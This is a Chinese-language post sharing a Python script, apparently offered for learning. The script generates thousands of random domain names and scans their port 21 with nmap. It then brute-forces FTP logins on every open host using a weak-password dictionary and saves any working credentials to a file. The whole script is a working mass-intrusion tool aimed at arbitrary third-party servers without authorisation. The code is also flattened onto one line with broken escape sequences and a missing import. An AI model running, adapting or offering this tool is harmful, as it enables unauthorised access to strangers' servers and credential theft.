本代碼屬于使用python3.4版本 主要是交流 高手勿噴!!
#!/usr/bin/python# -*- coding: utf-8 -*- import nmap # 需要使用nmap端口掃描工具的支持 這里不僅要安裝nmap的python包 還要安裝nmap的windows的應用程序 python包 直接使用pip安裝即可 至于nmap for windows 的版本如何安裝 請直接度娘 from socket import *import threading import sys,random,timeimport string,osimport configparser ### 配置文件包"""端口掃描工具 并且判斷如果端口21打開 嘗試暴力破解FTP"""screenLock = threading.Semaphore(value=1)def bruteLogin(hostname, passwdFile): """嘗試破解FTP""" pF = open(passwdFile, 'r') for line in pF.readlines(): time.sleep(1) userName = line.split(' ')[0] passWord = line.split(' ')[1].strip('/r').strip('/n') # PRint ("[+] 嘗試攻擊:%s "%hostname+userName+"/"+passWord) # print("[-]主機:",hostname)## try: ftp = ftplib.FTP(hostname) ftp.login(userName, passWord) print( '/n[*] ' + str(hostname) +/ ' FTP 賬號和密碼是: '+userName+"/"+passWord) ftp.quit() return (userName, passWord) except Exception: pass ##嘗試失敗 重試中 print( '/n[-]FTP %s攻擊失敗!.'%hostname) return (None, None) def nmapScan(tgtip,tgtPort,tgtHost): nmScan = nmap.PortScanner() try: nmScan.scan(tgtip,tgtPort) state=nmScan[tgtip]['tcp'][int(tgtPort)]['state'] except : return None return state def portScan(tgtHost, tgtPorts): try: tgtIP = gethostbyname(tgtHost) except: return try: tgtName = gethostbyaddr(tgtIP) ## 這里是反向查詢ip地址對應的DNS 主機名 except : tgtName = None setdefaulttimeout(1) scan = {} for tgtPort in tgtPorts: state = nmapScan(tgtIP,str(tgtPort),tgtHost) if state =="open": ### 發現開放端口 就在字典中寫入 if tgtHost not in scan : scan[tgtHost] = [] scan[tgtHost].append(str(tgtPort)) else: scan[tgtHost].append(str(tgtPort)) if len(scan)>0: ## 從字典中導出 根據字典中的數據寫配置文件 config =configparser.ConfigParser() config.add_section(tgtHost) config.set(tgtHost,"IP",tgtIP) if tgtName!=None: config.set(tgtHost,"主機名",tgtName[0]) else: config.set(tgtHost,"主機名","未知") print("當前線程數: %d 當前掃描主機%s開放的端口有:"%(threading.activeCount()-1,tgtHost),scan[tgtHost]) for x in scan[tgtHost]: config.set(tgtHost,"端口%s "%x," isopen") cfgfile = open('IpConfig.ini','a') config.write(cfgfile) cfgfile.close() if "21" in scan[tgtHost]: print( '/n[+]FTP %s開始攻擊!.'%tgtIP) passwdFile = 'userpass.txt' ##設置ftp弱口令的用戶名和密碼字典 字典存放的規則是 用戶名加空格加密碼后換行 類似于: username password/n res = bruteLogin(tgtIP, passwdFile) if res[0]!=None: ftp = open("ftp.txt","a") ftp.write(tgtIP+" : userName = "+res[0]+" password = "+res[1]) ftp.close() def gethost(x): lis = ['z','y','x','w','v','u','t','s','r','q','p','o','n','m','l','k','j','i','h','g','f','e','d','c','b','a','1','2','3','4','5','6','7','8','9','0'] s='' s = (s.join(random.sample(lis, x))).replace(" ","") ss = [s+".cn",s+".cc",s+".com",s+".net",s+".pw",s+".wang",s+".vip",s+".tv",s+".org",s+".pub"] return (s,ss) def main(): driver = "D://Python34//nmap" os.environ['PATH']=os.environ['PATH']+';'+driver ho =[] for x in range(12000): while True: ##這里是一個避免重復的排除方式 hos,Host =gethost(4) ###這里是隨機域名 if hos not in ho: ho.append(hos) break else: continue ## 21/tcp FTP 文件傳輸協議 ## 22/tcp SSH 安全登錄����、文件傳送(SCP)和端口重定向 ## 23/tcp Telnet 不安全的文本傳送 ## 25/tcp SMTP Simple Mail Transfer Protocol (E-mail) ## 69/udp TFTP Trivial File Transfer Protocol ## 79/tcp finger Finger ## 80/tcp HTTP 超文本傳送協議 (WWW) ## 88/tcp Kerberos Authenticating agent ## 110/tcp POP3 Post Office Protocol (E-mail) ## 113/tcp ident old identification server system ## 119/tcp NNTP used for usenet newsgroups ## 220/tcp IMAP3 ## 443/tcp HTTPS used for securely transferring web pages## 3389/tcp windows服務器遠程桌面端口## 445/tcp 共享打印機端口## 139/tcp 被用于Windows"文件和打印機共享"和SAMBA Port = [21,] ##需要掃描的端口 這里 是掃描了ftp服務器 所以為了效率 全部只掃描21號端口 for x in Host: t = threading.Thread(target=portScan,args=(x,Port)) ###開啟線程 掃描隨機的域名 t.start() while True: if threading.activeCount()-1>100: ## 這里做了一個緩沖 限制了最大擁有100多個線程 time.sleep(1) else: break if __name__ == '__main__': main()
